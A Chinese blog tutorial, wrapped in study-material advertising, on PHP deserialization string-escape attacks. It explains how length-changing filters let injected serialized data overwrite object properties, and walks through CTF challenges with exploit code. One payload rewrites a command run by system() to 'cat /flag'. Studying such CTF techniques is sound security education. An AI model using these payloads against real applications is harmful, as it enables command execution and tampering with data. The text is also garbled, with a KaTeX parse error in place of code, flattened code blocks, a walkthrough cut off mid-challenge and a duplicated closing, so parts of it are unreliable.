2024年网络安全最新php反序列化学习之字符串逃逸(1)，【面试必备

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

需要这份系统化资料的朋友，可以点击这里获取

function filter_repmore(KaTeX parse error: Expected '}', got 'EOF' at end of input: …place('b','cc',str); //把b换成cc，过滤后序列化整体字符串变长
}

前面我们也分析了，每有一个b，就会多出一个c无法被当做正常字符串去读取，而是按照正常流程去反序列化下一个属性和对应的值， ";s:4:“info”;s:6:“hacker”;} 这个我们输入的序列化字符串长度为27


**如果我们把name的值换成27个b+序列化字符串，27个b就会被过滤替换为54个c，而在反序列化时，由于name的长度在序列化时就确定为54（27个b+序列化字符串），php就会把前面54个c当作name的值来读取，后面的序列化字符串就会逃逸出去，正常反序列化，从而修改info**，如:

<?php include "func.php"; function filter\_repmore($str) //利用一个变量修改目标变量 { return str\_replace('b','cc',$str); } class A{ public $name='ben'; public $info="ctfer"; } $test1=new A(); print\_r($test1)."\n"; echo "\n".serialize($test1)."\n"; $tar='";s:4:"info";s:6:"hacker";}'; //27 $payload=get\_payload('b',strlen($tar),$tar); //利用getpayload生成利用的payload $test1->name=$payload; print\_r($test1)."\n"; print\_r(serialize($test1))."\n"; $res=filter\_repmore(serialize($test1)); echo "\n".$res."\n"; $c=unserialize($res); print\_r($c); ?>

![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/15d5a393504f40aa9e42e41a262a5d9f.png#pic_center)  
 可以看到，info的值被修改了


接下来以一道简单的题目来讲构造流程


#### 题目实战


newstarctf 2024 week4 逃


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/ef79a750748c4633a44e258c2262c1fc.png#pic_center)


可以看到，这里有个waf过滤函数，把对象序列化并过滤后再反序列化，是过滤后变长的题型


总体思路—>利用我们能控制的key去修改cmd，在\_\_destruct中system执行cmd


具体实现:


1拿下来源码放在本地，稍作修改:

<?php include "func.php"; //highlight\_file(\_\_FILE\_\_); function waf($str) { return str\_replace("bad", "good", $str); } //利用key去修改cmd key= class GetFlag { public $key='123'; public $cmd = "ls"; #cmd是我们要去修改的，先写死 public function \_\_construct($key) { $this->key = $key; } public function \_\_destruct() { system($this->cmd); } } echo serialize(new GetFlag()); # ``` 这段代码就是查看正常的序列化后的字符串（其中含有我们想要的cmd值），当然如果对序列化熟悉的话可以直接构造payload  把红框部分拿下来即可 2.配合前面写的get\_payload函数构造payload，并在本地尝试是否成功 bad被替换为good，一个bad可以逃逸一个字符，所以需要直接传入序列化字符串长度即可  可以看到，在本地实验成功，接下来只要修改cmd的值为其他系统命令，**再修改序列化字符串中cmd的长度**，然后把$payload传过去即可 最后的exp: ``` <?php include "func.php"; //highlight\_file(\_\_FILE\_\_); function waf($str) { return str\_replace("bad", "good", $str); } //利用key去修改cmd class GetFlag { public $key='ls'; public $cmd = "whoami"; public function \_\_construct($key) { $this->key = $key; } public function \_\_destruct() { system($this->cmd); } } $key='";s:3:"cmd";s:9:"cat /flag";}'; $payload=get\_payload('bad',strlen($key),$key); echo "\n".$payload; ?>

![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/3d151f693b734d32a4ae325cd3baa859.png#pic_center)  
 把payload赋值为key即可，


结果:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7354fa75b6cf4340a6cf40bc5100b8d6.png#pic_center)


### 过滤后变短


#### 实验学习

<?php include "func.php"; function filter\_repless($str) //利用两个变量修改目标变量 { return str\_replace('b','',$str); } class C{ // name全填上会被替换的内容 public $name='ben'; // info填payload public $info="ctfer"; public $password='123456'; } ``` 像上面的过滤函数，把b替换为空，替换后序列化的字符串长度减少，就是过滤后变短的情况，这一种就是与变长不同，要利用两个变量（info和name）去修改两个变量（info和password） 第一步，也是要先拿到我们含有修改目标的序列化字符串,name值随意  我们的目的也是一样的，要通过";构造闭合，然后让php来反序列化我们设计好的序列化字符串，从而修改变量，尝试把info的值赋值为上面红框里的序列化字符串，那为什么不跟变长的类型一样，直接把序列化字符串跟在name的值后面呢？看下图:  如果跟在name后面，由于name的长度本身就很长，过滤后name的值变短了，我们的序列化字符串就会被读取为name的值(逃不出去)，就无法发挥它的作用了，所以要把info的值设为序列化字符串  如果要让绿框内的字符串正常反序列化，而不是被当作字符串读取，红框内的全部内容就填充进name的值中，";s:4:“info”;s:60:"长度为19，**如果name的值设为19个b，经过过滤函数过滤为空后，那么php就会往下读取，把本不该读取的 “;s:4:“info”;s:60:” 读取为name的值，后面的序列化字符串就会逃逸出去，不被当作字符串来读取，而是被成功反序列化，修改info** 完整实验代码: ``` <?php include "func.php"; function filter\_repless($str) //利用两个变量修改目标变量 { return str\_replace('b','',$str); } class C{ // name全填上会被替换的内容 public $name='ben'; // info填payload public $info="ctfer"; public $password='123456'; } $test1=new C(); echo serialize($test1)."\n"; $tar='";s:4:"info";s:6:"hacker";s:8:"password";s:10:"helloworld";}'; $test1->name=get\_payload('b',19); $test1->info=$tar; print\_r(($test1)); $res=serialize($test1); $r=filter\_repless($res); echo $res; echo "\n".$r."\n"; $c=unserialize($r); print\_r($c); ?>

![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/902eb66514234c47be1e128de80aee89.png#pic_center)


反序列化成功，password被修改，name具体要多少个被替换的字符，要根据题目实际来计算


#### 题目实战


上网找了一个也是比较简单的题目的源码

<?php show\_source("index123.php"); //error\_reporting(0); function filter($str) { return preg\_replace('/abc|zcxx/','',$str); } class Login{ public $name; public $pwd; public $money; public function \_\_construct() { $this->name=$\_GET['name']; $this->pwd=$\_GET['pwd']; $this->money='999'; } } if($\_GET['name']&&$\_GET['pwd']) { $login = new Login(); $last = unserialize(filter(serialize($login))); if ($last->money < 1000) { echo('get more money'); } else { echo file\_get\_contents('flag.php'); } } else { die("name and password can't be null"); } ?>

由源码可知，需要修改money参数>1000,才能拿到flag，name和pwd是我们可以控制的，利用name和pwd修改money，由过滤函数可知过滤后变短的题型，



## 写在最后

**在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。**


需要完整版PDF学习资源私我



**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**

代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。**


需要完整版PDF学习资源私我



**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**